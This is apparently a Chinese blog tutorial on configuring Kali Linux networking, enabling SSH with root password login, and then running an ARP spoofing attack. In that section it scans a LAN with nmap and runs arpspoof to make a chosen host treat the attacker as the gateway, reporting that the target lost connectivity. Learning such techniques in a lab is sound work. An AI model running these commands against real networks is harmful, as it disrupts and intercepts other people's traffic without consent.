前言
这次主要分享一下关于配置kali linux的ip地址,然后利用它来进行远程登录实测。最后在整个有意思的小实测。arp欺骗攻击。感觉有意思的小伙伴点个赞肯定一下,话不多说,开整。
一、配置ip
1.配置临时ip
优点:配置完生效
缺点:重启后失效
从图里很轻松可以看到配置生效。
// 配置临时ip地址
ifconfig eth0 临时IP/24
注意事项:使用桥接网络的时候记得让临时IP与主机IP处于同一网段!!!!!!
2.配置永久ip
优点:永久有效
缺点:电脑重启后生效
首先进入网口配置
// etc是配置文件夹network是网络相关,interfas是接口
vim /etc/network/interfaces
vim /etc/resolv.conf
是进入域名配置,一般用不到,可以不用配置。如果是空的话,可以在其中添加
nameserver 8.8.8.8.
配置完成之后重启。
// init.d目录中存放的是一系列系统服务的管理(启动与停止)脚本。
/etc/init.d/networking restart
配置如下图。保存退出。
重启电脑后查看,网络良好,IP地址改变,配置成功。
二、远程登录
1.配置ssh
进入配置页面
// 进入ssh配置文件。SSH是专为远程登录会话和其他网络服务提供安全性的协议
vim /etc/ssh/sshd.config
修改文挡亮光处,允许root远程登录
PermitRootLogin yes
记得取消#
号,使其生效。也可以取消掉PublivkeyAuthentication yes
前的#
号·,表示允许公钥登录。取不取消都不要紧。
重启服务并检查。
/etc/init.d/ssh restart
//一般来说默认22号端口部署ssh服务。lsof命令用于查看你进程开打的文件
//查看22号端口占用情况
lsof -i :22
很明显,部署完成。
2.利用xshell检测
先建立新连接填写信息
点击用户身份验证
填写用户名密码
选择接受并保存
ok,登陆成功。
在这里将ssh服务设置为开机启动项。
//Ubuntu或者Debian系统中update-rc.d命令,是用来更新系统启动项的脚本。
//这些脚本的链接位于/etc/rcN.d/目录,对应脚本位于/etc/init.d/目录。
update-rc.d ssh enable
三、arp欺骗攻击
先找攻击目标
//扫描存活主机
nmap -sP 本机ip网段/24
咱们就选取这个104做实验对象
192.168.1.104
主机状态正常,联网正常
//进行欺骗,让目标认为我们是网关
arpspoof -i eth0 -t 目标IP 网关IP
检测,欺骗成功。目标联网异常。
总结
以上就是今天分享的内衣,老规矩,觉得有帮助的兄弟点个赞。再会,铁子。